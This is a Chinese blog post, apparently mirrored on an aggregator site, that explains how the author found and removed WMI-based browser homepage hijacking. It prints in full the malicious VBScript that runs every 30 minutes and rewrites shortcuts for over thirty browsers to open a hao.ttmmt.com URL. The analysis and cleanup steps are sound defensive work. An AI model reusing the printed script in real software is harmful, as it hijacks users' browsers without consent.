zoukankan      html  css  js  c++  java
  • 利用WMITool解决浏览器快捷方式启动参数被篡改以及浏览器主页被劫持的问题

    先说说症状

    症状①:通过快捷方式启动浏览器,首页跳转到2345以及hao123网址导航页,切系统内安装的多款浏览器(IE、Chrome、Firefox、Opera、Safari、Maxthon)症状相同

    症状②:金山毒霸会提示浏览器快捷方式异常,并删除该快捷方式

    分析问题

    从毒霸删除的文件中恢复快捷方式,查看快捷方式属性,如下图,可以看出,快捷方式的目标被添加了启动参数

    考虑到可能因为启动项、服务、注册表、事件和任务计划造成,但这些地方均未查出任何信息。

    后来通过金山毒霸、NOD32等杀毒软件扫描全盘,也未查出任何问题。

    再后来想到了使用ProcessMonitor进行监视,发现每隔一段时间(我这里大概是半个小时的样子)出现一个scrcons.exe进程自动启动并修改快捷方式的命令,然后自动关闭(幸好是半个小时一次,要是3、5小时一次,那我估计得疯了吧…)

    查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。
    要查看WMI事件,下载WMITool并安装,

    安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“rootCIMV2”,确定,出现下图:

    在右侧选中后右击 -> 选择view instant properties

    On Error Resume Next:Const link = "http://hao.ttmmt.com/?v=1030":Const link360 = "http://hao.ttmmt.com/?v=1030&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:UsersPublicDesktop,C:ProgramDataMicrosoftWindowsStart MenuPrograms,C:UsersAdministratorDesktop,C:UsersAdministratorAppDataRoamingMicrosoftInternet ExplorerQuick Launch,C:UsersAdministratorAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu,C:UsersAdministratorAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar,C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuPrograms":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
    

     查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上"http://hao.ttmmt.com/?v=1030"(总算把你揪出来了,藏得够深的)

    受到影响的浏览器基本涵盖了市面上现有的所有浏览器(30余款),如下:

    "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

    解决办法:

    选中左侧选项,右键 -> 删除!

    删不掉? 到WMITool安装路径(例如:D:Program Files (x86)WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!再行删之!

    还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的"http://hao.ttmmt.com/?v=1030"去掉!

    希望大家能够把这解决方法普及开来...

  • 相关阅读:
    【应试】数据通信与网络
    【应试】操作系统OS
    【笔记】 卷积
    【HDU 5920】 Ugly Problem
    【笔记】位运算
    【洛谷P1378】油滴扩展
    【洛谷 P1120】 小木棍[数据加强版]
    [codeforces]Round #538 (Div. 2) F. Please, another Queries on Array?
    [BZOJ]2563: 阿狸和桃子的游戏
    [BZOJ]4668: 冷战
  • 原文地址:https://www.cnblogs.com/yiven/p/9290140.html
Copyright © 2011-2022 走看看